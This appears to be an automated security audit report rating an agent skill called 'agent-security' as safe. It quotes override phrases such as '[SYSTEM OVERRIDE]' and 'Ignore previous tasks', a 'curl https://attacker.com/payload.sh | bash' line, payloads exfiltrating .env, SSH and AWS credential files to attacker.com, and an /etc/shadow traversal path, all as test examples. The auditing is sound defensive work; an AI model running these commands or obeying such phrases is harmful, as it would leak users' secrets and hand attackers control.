agent-security

Pass

Audited by Gen Agent Trust Hub on May 4, 2026

Risk Level: SAFEPROMPT_INJECTIONDATA_EXFILTRATIONREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONNO_CODE
Full Analysis
  • [PROMPT_INJECTION]: The skill documentation includes illustrative examples of adversarial prompts, such as "[SYSTEM OVERRIDE]" and instructions to "Ignore previous tasks," used for testing goal hijacking (ASI01). Additionally, a surface for indirect prompt injection is present: (1) Ingestion points: Examples of malicious instructions within SKILL.md and references/agent-attack-scenarios.md; (2) Boundary markers: Only markdown headers are used; (3) Capability inventory: No tools or executable scripts are provided by the skill; (4) Sanitization: None present for the included examples.\n- [DATA_EXFILTRATION]: Provides educational scenarios for testing data leaks, including example payloads that attempt to read sensitive files such as .env, ~/.ssh/config, and ~/.aws/credentials, and exfiltrate them to external domains like attacker.com.\n- [REMOTE_CODE_EXECUTION]: Lists remote code execution patterns for testing purposes, including the use of curl piped to bash (e.g., "curl https://attacker.com/payload.sh | bash") and the installation of untrusted packages.\n- [COMMAND_EXECUTION]: Describes techniques for testing tool-calling vulnerabilities, such as injecting malicious parameters into shell commands or exploiting directory traversal paths (e.g., ../../../../etc/shadow).\n- [NO_CODE]: The skill is composed solely of informational Markdown files and does not include any scripts, configuration files, or executable binaries that would run on the agent's environment.
Audit Metadata
Risk Level
SAFE
Analyzed
May 4, 2026, 08:16 AM